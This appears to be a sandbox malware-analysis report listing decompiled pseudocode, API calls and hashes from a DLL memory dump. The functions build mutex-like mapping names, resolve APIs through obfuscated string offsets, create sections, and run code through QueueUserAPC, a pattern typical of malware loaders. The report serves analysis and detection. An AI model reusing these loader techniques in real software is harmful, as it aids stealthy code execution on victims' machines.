                                                                                                                                                                                                                                                              				struct _FILETIME* _t14;
                                                                                                                                                                                                                                                              				intOrPtr _t15;
                                                                                                                                                                                                                                                              				long _t18;
                                                                                                                                                                                                                                                              				void* _t19;
                                                                                                                                                                                                                                                              				void* _t22;
                                                                                                                                                                                                                                                              				intOrPtr _t31;
                                                                                                                                                                                                                                                              				long _t32;
                                                                                                                                                                                                                                                              				void* _t34;
                                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                                              				_t31 = __edx;
                                                                                                                                                                                                                                                              				_t14 =  &_v16;
                                                                                                                                                                                                                                                              				GetSystemTimeAsFileTime(_t14);
                                                                                                                                                                                                                                                              				_push(0x192);
                                                                                                                                                                                                                                                              				_push(0x54d38000);
                                                                                                                                                                                                                                                              				_push(_v12);
                                                                                                                                                                                                                                                              				_push(_v16);
                                                                                                                                                                                                                                                              				L6E202210();
                                                                                                                                                                                                                                                              				_push(_t14);
                                                                                                                                                                                                                                                              				_v16 = _t14;
                                                                                                                                                                                                                                                              				_t15 =  *0x6e2041d0;
                                                                                                                                                                                                                                                              				_push(_t15 + 0x6e20505e);
                                                                                                                                                                                                                                                              				_push(_t15 + 0x6e205054);
                                                                                                                                                                                                                                                              				_push(0x16);
                                                                                                                                                                                                                                                              				_push( &_v60);
                                                                                                                                                                                                                                                              				_v12 = _t31;
                                                                                                                                                                                                                                                              				L6E20220A();
                                                                                                                                                                                                                                                              				_t18 = _a4;
                                                                                                                                                                                                                                                              				if(_t18 == 0) {
                                                                                                                                                                                                                                                              					_t18 = 0x1000;
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				_t19 = CreateFileMappingW(0xffffffff, 0x6e2041c0, 4, 0, _t18,  &_v60); // executed
                                                                                                                                                                                                                                                              				_t34 = _t19;
                                                                                                                                                                                                                                                              				if(_t34 == 0) {
                                                                                                                                                                                                                                                              					_t32 = GetLastError();
                                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                                              					if(_a4 != 0 || GetLastError() == 0xb7) {
                                                                                                                                                                                                                                                              						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                                                                                                                                                                                                                                                              						if(_t22 == 0) {
                                                                                                                                                                                                                                                              							_t32 = GetLastError();
                                                                                                                                                                                                                                                              							if(_t32 != 0) {
                                                                                                                                                                                                                                                              								goto L9;
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                                              							 *_a8 = _t34;
                                                                                                                                                                                                                                                              							 *_a12 = _t22;
                                                                                                                                                                                                                                                              							_t32 = 0;
                                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                                              						_t32 = 2;
                                                                                                                                                                                                                                                              						L9:
                                                                                                                                                                                                                                                              						CloseHandle(_t34);
                                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				return _t32;
                                                                                                                                                                                                                                                              			}














                                                                                                                                                                                                                                                              0x6e201979
                                                                                                                                                                                                                                                              0x6e201982
                                                                                                                                                                                                                                                              0x6e201986
                                                                                                                                                                                                                                                              0x6e20198c
                                                                                                                                                                                                                                                              0x6e201991
                                                                                                                                                                                                                                                              0x6e201996
                                                                                                                                                                                                                                                              0x6e201999
                                                                                                                                                                                                                                                              0x6e20199c
                                                                                                                                                                                                                                                              0x6e2019a1
                                                                                                                                                                                                                                                              0x6e2019a2
                                                                                                                                                                                                                                                              0x6e2019a5
                                                                                                                                                                                                                                                              0x6e2019b0
                                                                                                                                                                                                                                                              0x6e2019b7
                                                                                                                                                                                                                                                              0x6e2019bb
                                                                                                                                                                                                                                                              0x6e2019bd
                                                                                                                                                                                                                                                              0x6e2019be
                                                                                                                                                                                                                                                              0x6e2019c1
                                                                                                                                                                                                                                                              0x6e2019c6
                                                                                                                                                                                                                                                              0x6e2019d0
                                                                                                                                                                                                                                                              0x6e2019d2
                                                                                                                                                                                                                                                              0x6e2019d2
                                                                                                                                                                                                                                                              0x6e2019e6
                                                                                                                                                                                                                                                              0x6e2019ec
                                                                                                                                                                                                                                                              0x6e2019f0
                                                                                                                                                                                                                                                              0x6e201a40
                                                                                                                                                                                                                                                              0x6e2019f2
                                                                                                                                                                                                                                                              0x6e2019fb
                                                                                                                                                                                                                                                              0x6e201a11
                                                                                                                                                                                                                                                              0x6e201a19
                                                                                                                                                                                                                                                              0x6e201a2b
                                                                                                                                                                                                                                                              0x6e201a2f
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201a1b
                                                                                                                                                                                                                                                              0x6e201a1e
                                                                                                                                                                                                                                                              0x6e201a23
                                                                                                                                                                                                                                                              0x6e201a25
                                                                                                                                                                                                                                                              0x6e201a25
                                                                                                                                                                                                                                                              0x6e201a06
                                                                                                                                                                                                                                                              0x6e201a08
                                                                                                                                                                                                                                                              0x6e201a31
                                                                                                                                                                                                                                                              0x6e201a32
                                                                                                                                                                                                                                                              0x6e201a32
                                                                                                                                                                                                                                                              0x6e2019fb
                                                                                                                                                                                                                                                              0x6e201a48

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6E20176E,0000000A,?,?), ref: 6E201986
                                                                                                                                                                                                                                                              • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E20199C
                                                                                                                                                                                                                                                              • _snwprintf.NTDLL ref: 6E2019C1
                                                                                                                                                                                                                                                              • CreateFileMappingW.KERNELBASE(000000FF,6E2041C0,00000004,00000000,?,?), ref: 6E2019E6
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E20176E,0000000A,?), ref: 6E2019FD
                                                                                                                                                                                                                                                              • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6E201A11
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E20176E,0000000A,?), ref: 6E201A29
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6E20176E,0000000A), ref: 6E201A32
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E20176E,0000000A,?), ref: 6E201A3A
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472920396.000000006E201000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472896080.000000006E200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472934732.000000006E203000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472952779.000000006E205000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472968446.000000006E206000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1724014008-0
                                                                                                                                                                                                                                                              • Opcode ID: c8d851f39d5243e62128393ef7c114c262424e76e4865141163a96beed57982c
                                                                                                                                                                                                                                                              • Instruction ID: 0fd1ad9b33354598d39a0056cdae83ac4f47f71e79f8f3af4dd86801b30fcd67
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8d851f39d5243e62128393ef7c114c262424e76e4865141163a96beed57982c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A02190B250011DAFDB119FE8DC88E9E77AFEB49359F104029F611E71C0D6705A85CB70
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                                              			E6E201AA5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t33;
                                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t36;
                                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t39;
                                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t42;
                                                                                                                                                                                                                                                              				intOrPtr _t46;
                                                                                                                                                                                                                                                              				struct HINSTANCE__* _t50;
                                                                                                                                                                                                                                                              				intOrPtr _t56;
                                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                                              				_t56 = E6E201C8F(0x20);
                                                                                                                                                                                                                                                              				if(_t56 == 0) {
                                                                                                                                                                                                                                                              					_v8 = 8;
                                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                                              					_t50 = GetModuleHandleA( *0x6e2041d0 + 0x6e205014);
                                                                                                                                                                                                                                                              					_v8 = 0x7f;
                                                                                                                                                                                                                                                              					_t29 = GetProcAddress(_t50,  *0x6e2041d0 + 0x6e2050e1);
                                                                                                                                                                                                                                                              					 *(_t56 + 0xc) = _t29;
                                                                                                                                                                                                                                                              					if(_t29 == 0) {
                                                                                                                                                                                                                                                              						L8:
                                                                                                                                                                                                                                                              						E6E20136A(_t56);
                                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                                              						_t33 = GetProcAddress(_t50,  *0x6e2041d0 + 0x6e2050f1);
                                                                                                                                                                                                                                                              						 *(_t56 + 0x10) = _t33;
                                                                                                                                                                                                                                                              						if(_t33 == 0) {
                                                                                                                                                                                                                                                              							goto L8;
                                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                                              							_t36 = GetProcAddress(_t50,  *0x6e2041d0 + 0x6e205104);
                                                                                                                                                                                                                                                              							 *(_t56 + 0x14) = _t36;
                                                                                                                                                                                                                                                              							if(_t36 == 0) {
                                                                                                                                                                                                                                                              								goto L8;
                                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                                              								_t39 = GetProcAddress(_t50,  *0x6e2041d0 + 0x6e205119);
                                                                                                                                                                                                                                                              								 *(_t56 + 0x18) = _t39;
                                                                                                                                                                                                                                                              								if(_t39 == 0) {
                                                                                                                                                                                                                                                              									goto L8;
                                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                                              									_t42 = GetProcAddress(_t50,  *0x6e2041d0 + 0x6e20512f);
                                                                                                                                                                                                                                                              									 *(_t56 + 0x1c) = _t42;
                                                                                                                                                                                                                                                              									if(_t42 == 0) {
                                                                                                                                                                                                                                                              										goto L8;
                                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                                              										 *((intOrPtr*)(_t56 + 8)) = _a8;
                                                                                                                                                                                                                                                              										 *((intOrPtr*)(_t56 + 4)) = _a4;
                                                                                                                                                                                                                                                              										_t46 = E6E2018D1(_t56, _a12); // executed
                                                                                                                                                                                                                                                              										_v8 = _t46;
                                                                                                                                                                                                                                                              										if(_t46 != 0) {
                                                                                                                                                                                                                                                              											goto L8;
                                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                                              											 *_a16 = _t56;
                                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				return _v8;
                                                                                                                                                                                                                                                              			}












                                                                                                                                                                                                                                                              0x6e201ab3
                                                                                                                                                                                                                                                              0x6e201ab7
                                                                                                                                                                                                                                                              0x6e201b78
                                                                                                                                                                                                                                                              0x6e201abd
                                                                                                                                                                                                                                                              0x6e201ad5
                                                                                                                                                                                                                                                              0x6e201ae4
                                                                                                                                                                                                                                                              0x6e201aeb
                                                                                                                                                                                                                                                              0x6e201aef
                                                                                                                                                                                                                                                              0x6e201af2
                                                                                                                                                                                                                                                              0x6e201b70
                                                                                                                                                                                                                                                              0x6e201b71
                                                                                                                                                                                                                                                              0x6e201af4
                                                                                                                                                                                                                                                              0x6e201b01
                                                                                                                                                                                                                                                              0x6e201b05
                                                                                                                                                                                                                                                              0x6e201b08
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201b0a
                                                                                                                                                                                                                                                              0x6e201b17
                                                                                                                                                                                                                                                              0x6e201b1b
                                                                                                                                                                                                                                                              0x6e201b1e
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201b20
                                                                                                                                                                                                                                                              0x6e201b2d
                                                                                                                                                                                                                                                              0x6e201b31
                                                                                                                                                                                                                                                              0x6e201b34
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201b36
                                                                                                                                                                                                                                                              0x6e201b43
                                                                                                                                                                                                                                                              0x6e201b47
                                                                                                                                                                                                                                                              0x6e201b4a
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201b4c
                                                                                                                                                                                                                                                              0x6e201b52
                                                                                                                                                                                                                                                              0x6e201b58
                                                                                                                                                                                                                                                              0x6e201b5d
                                                                                                                                                                                                                                                              0x6e201b64
                                                                                                                                                                                                                                                              0x6e201b67
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201b69
                                                                                                                                                                                                                                                              0x6e201b6c
                                                                                                                                                                                                                                                              0x6e201b6c
                                                                                                                                                                                                                                                              0x6e201b67
                                                                                                                                                                                                                                                              0x6e201b4a
                                                                                                                                                                                                                                                              0x6e201b34
                                                                                                                                                                                                                                                              0x6e201b1e
                                                                                                                                                                                                                                                              0x6e201b08
                                                                                                                                                                                                                                                              0x6e201af2
                                                                                                                                                                                                                                                              0x6e201b86

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 6E201C8F: HeapAlloc.KERNEL32(00000000,?,6E20117D,?,00000000,00000000,?,?,?,6E201810), ref: 6E201C9B
                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6E201272,?,?,?,?,00000002,00000000,?,?), ref: 6E201AC9
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 6E201AEB
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 6E201B01
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 6E201B17
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 6E201B2D
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 6E201B43
                                                                                                                                                                                                                                                                • Part of subcall function 6E2018D1: NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,?), ref: 6E20192E
                                                                                                                                                                                                                                                                • Part of subcall function 6E2018D1: memset.NTDLL ref: 6E201950
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472920396.000000006E201000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472896080.000000006E200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472934732.000000006E203000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472952779.000000006E205000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472968446.000000006E206000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1632424568-0
                                                                                                                                                                                                                                                              • Opcode ID: 949e389da852b8001c93ebe2b79e366dae7fba7e2a51fad3aa45882ee63347be
                                                                                                                                                                                                                                                              • Instruction ID: f8f8d66a9847529b30577345b35244a229110c95d72f9cc7fbc2e4f18fccae67
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 949e389da852b8001c93ebe2b79e366dae7fba7e2a51fad3aa45882ee63347be
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 132180B150060F9FDB50EFA9C884E5AB7EEFF59288B004529E855D7290E370EA45CBB0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                                                                                                              			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                              				long _v8;
                                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                                              				void* __ebp;
                                                                                                                                                                                                                                                              				char _t9;
                                                                                                                                                                                                                                                              				void* _t10;
                                                                                                                                                                                                                                                              				void* _t18;
                                                                                                                                                                                                                                                              				void* _t23;
                                                                                                                                                                                                                                                              				void* _t36;
                                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                                              				_t9 = _a8;
                                                                                                                                                                                                                                                              				_v8 = 1;
                                                                                                                                                                                                                                                              				if(_t9 == 0) {
                                                                                                                                                                                                                                                              					_t10 = InterlockedDecrement(0x6e204188);
                                                                                                                                                                                                                                                              					__eflags = _t10;
                                                                                                                                                                                                                                                              					if(_t10 == 0) {
                                                                                                                                                                                                                                                              						__eflags =  *0x6e20418c;
                                                                                                                                                                                                                                                              						if( *0x6e20418c != 0) {
                                                                                                                                                                                                                                                              							_t36 = 0x2328;
                                                                                                                                                                                                                                                              							while(1) {
                                                                                                                                                                                                                                                              								SleepEx(0x64, 1);
                                                                                                                                                                                                                                                              								__eflags =  *0x6e204198;
                                                                                                                                                                                                                                                              								if( *0x6e204198 == 0) {
                                                                                                                                                                                                                                                              									break;
                                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                                              								_t36 = _t36 - 0x64;
                                                                                                                                                                                                                                                              								__eflags = _t36;
                                                                                                                                                                                                                                                              								if(_t36 > 0) {
                                                                                                                                                                                                                                                              									continue;
                                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                                              								break;
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              							CloseHandle( *0x6e20418c);
                                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                                              						HeapDestroy( *0x6e204190);
                                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                                              					if(_t9 == 1 && InterlockedIncrement(0x6e204188) == 1) {
                                                                                                                                                                                                                                                              						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                                                                                                                                              						_t41 = _t18;
                                                                                                                                                                                                                                                              						 *0x6e204190 = _t18;
                                                                                                                                                                                                                                                              						if(_t18 == 0) {
                                                                                                                                                                                                                                                              							L6:
                                                                                                                                                                                                                                                              							_v8 = 0;
                                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                                              							 *0x6e2041b0 = _a4;
                                                                                                                                                                                                                                                              							asm("lock xadd [eax], edi");
                                                                                                                                                                                                                                                              							_push( &_a8);
                                                                                                                                                                                                                                                              							_t23 = E6E201CA4(E6E201D32, E6E201EE0(_a12, 1, 0x6e204198, _t41));
                                                                                                                                                                                                                                                              							 *0x6e20418c = _t23;
                                                                                                                                                                                                                                                              							if(_t23 == 0) {
                                                                                                                                                                                                                                                              								asm("lock xadd [esi], eax");
                                                                                                                                                                                                                                                              								goto L6;
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				return _v8;
                                                                                                                                                                                                                                                              			}












                                                                                                                                                                                                                                                              0x6e201e07
                                                                                                                                                                                                                                                              0x6e201e13
                                                                                                                                                                                                                                                              0x6e201e15
                                                                                                                                                                                                                                                              0x6e201e18
                                                                                                                                                                                                                                                              0x6e201e8e
                                                                                                                                                                                                                                                              0x6e201e94
                                                                                                                                                                                                                                                              0x6e201e96
                                                                                                                                                                                                                                                              0x6e201e98
                                                                                                                                                                                                                                                              0x6e201e9e
                                                                                                                                                                                                                                                              0x6e201ea0
                                                                                                                                                                                                                                                              0x6e201ea5
                                                                                                                                                                                                                                                              0x6e201ea8
                                                                                                                                                                                                                                                              0x6e201eb3
                                                                                                                                                                                                                                                              0x6e201eb5
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201eb7
                                                                                                                                                                                                                                                              0x6e201eba
                                                                                                                                                                                                                                                              0x6e201ebc
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201ebc
                                                                                                                                                                                                                                                              0x6e201ec4
                                                                                                                                                                                                                                                              0x6e201ec4
                                                                                                                                                                                                                                                              0x6e201ed0
                                                                                                                                                                                                                                                              0x6e201ed0
                                                                                                                                                                                                                                                              0x6e201e1a
                                                                                                                                                                                                                                                              0x6e201e1b
                                                                                                                                                                                                                                                              0x6e201e3b
                                                                                                                                                                                                                                                              0x6e201e41
                                                                                                                                                                                                                                                              0x6e201e43
                                                                                                                                                                                                                                                              0x6e201e48
                                                                                                                                                                                                                                                              0x6e201e84
                                                                                                                                                                                                                                                              0x6e201e84
                                                                                                                                                                                                                                                              0x6e201e4a
                                                                                                                                                                                                                                                              0x6e201e52
                                                                                                                                                                                                                                                              0x6e201e59
                                                                                                                                                                                                                                                              0x6e201e63
                                                                                                                                                                                                                                                              0x6e201e6f
                                                                                                                                                                                                                                                              0x6e201e76
                                                                                                                                                                                                                                                              0x6e201e7b
                                                                                                                                                                                                                                                              0x6e201e80
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201e80
                                                                                                                                                                                                                                                              0x6e201e7b
                                                                                                                                                                                                                                                              0x6e201e48
                                                                                                                                                                                                                                                              0x6e201e1b
                                                                                                                                                                                                                                                              0x6e201edd

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(6E204188), ref: 6E201E26
                                                                                                                                                                                                                                                              • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6E201E3B
                                                                                                                                                                                                                                                                • Part of subcall function 6E201CA4: CreateThread.KERNELBASE ref: 6E201CBB
                                                                                                                                                                                                                                                                • Part of subcall function 6E201CA4: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E201CD0
                                                                                                                                                                                                                                                                • Part of subcall function 6E201CA4: GetLastError.KERNEL32(00000000), ref: 6E201CDB
                                                                                                                                                                                                                                                                • Part of subcall function 6E201CA4: TerminateThread.KERNEL32(00000000,00000000), ref: 6E201CE5
                                                                                                                                                                                                                                                                • Part of subcall function 6E201CA4: CloseHandle.KERNEL32(00000000), ref: 6E201CEC
                                                                                                                                                                                                                                                                • Part of subcall function 6E201CA4: SetLastError.KERNEL32(00000000), ref: 6E201CF5
                                                                                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(6E204188), ref: 6E201E8E
                                                                                                                                                                                                                                                              • SleepEx.KERNEL32(00000064,00000001), ref: 6E201EA8
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 6E201EC4
                                                                                                                                                                                                                                                              • HeapDestroy.KERNEL32 ref: 6E201ED0
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472920396.000000006E201000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472896080.000000006E200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472934732.000000006E203000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472952779.000000006E205000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472968446.000000006E206000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2110400756-0
                                                                                                                                                                                                                                                              • Opcode ID: 6a1c31c51e102700e5bd65411e26f0b44efeafe804a09c5d3cfb8b7600d33b06
                                                                                                                                                                                                                                                              • Instruction ID: ee1cf1b41f7b99f91a757e30858cd2d21c2cc70094f9a10052d359d57c3d86c7
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a1c31c51e102700e5bd65411e26f0b44efeafe804a09c5d3cfb8b7600d33b06
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9218471A0060AEBCB409FD9CC8CE5EBBABFB66369714842DE505D31C0E7708945CB70
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                                              			E6E201CA4(long _a4, DWORD* _a12) {
                                                                                                                                                                                                                                                              				_Unknown_base(*)()* _v0;
                                                                                                                                                                                                                                                              				void* _t4;
                                                                                                                                                                                                                                                              				long _t6;
                                                                                                                                                                                                                                                              				long _t11;
                                                                                                                                                                                                                                                              				void* _t13;
                                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                                              				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e2041cc, 0, _a12); // executed
                                                                                                                                                                                                                                                              				_t13 = _t4;
                                                                                                                                                                                                                                                              				if(_t13 != 0) {
                                                                                                                                                                                                                                                              					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                                                                                                                                                                                                                                                              					if(_t6 == 0) {
                                                                                                                                                                                                                                                              						_t11 = GetLastError();
                                                                                                                                                                                                                                                              						TerminateThread(_t13, _t11);
                                                                                                                                                                                                                                                              						CloseHandle(_t13);
                                                                                                                                                                                                                                                              						_t13 = 0;
                                                                                                                                                                                                                                                              						SetLastError(_t11);
                                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				return _t13;
                                                                                                                                                                                                                                                              			}








                                                                                                                                                                                                                                                              0x6e201cbb
                                                                                                                                                                                                                                                              0x6e201cc1
                                                                                                                                                                                                                                                              0x6e201cc5
                                                                                                                                                                                                                                                              0x6e201cd0
                                                                                                                                                                                                                                                              0x6e201cd8
                                                                                                                                                                                                                                                              0x6e201ce1
                                                                                                                                                                                                                                                              0x6e201ce5
                                                                                                                                                                                                                                                              0x6e201cec
                                                                                                                                                                                                                                                              0x6e201cf3
                                                                                                                                                                                                                                                              0x6e201cf5
                                                                                                                                                                                                                                                              0x6e201cfb
                                                                                                                                                                                                                                                              0x6e201cd8
                                                                                                                                                                                                                                                              0x6e201cff

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateThread.KERNELBASE ref: 6E201CBB
                                                                                                                                                                                                                                                              • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E201CD0
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000), ref: 6E201CDB
                                                                                                                                                                                                                                                              • TerminateThread.KERNEL32(00000000,00000000), ref: 6E201CE5
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 6E201CEC
                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 6E201CF5
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472920396.000000006E201000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472896080.000000006E200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472934732.000000006E203000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472952779.000000006E205000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472968446.000000006E206000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3832013932-0
                                                                                                                                                                                                                                                              • Opcode ID: 08245ec61b8de3c6cd9aa21b34f451a5f88f4773593651c336bb16d0eecc95d6
                                                                                                                                                                                                                                                              • Instruction ID: cb538d8c5c5344ca38fe04e47bf13e4e498013f2a567c3afe4fbba3e043af4aa
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08245ec61b8de3c6cd9aa21b34f451a5f88f4773593651c336bb16d0eecc95d6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12F01C36606A22BBDB525BA08C0CF5BBF6BFB1A752F00440DFA09911D0C7A18A55DBB5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
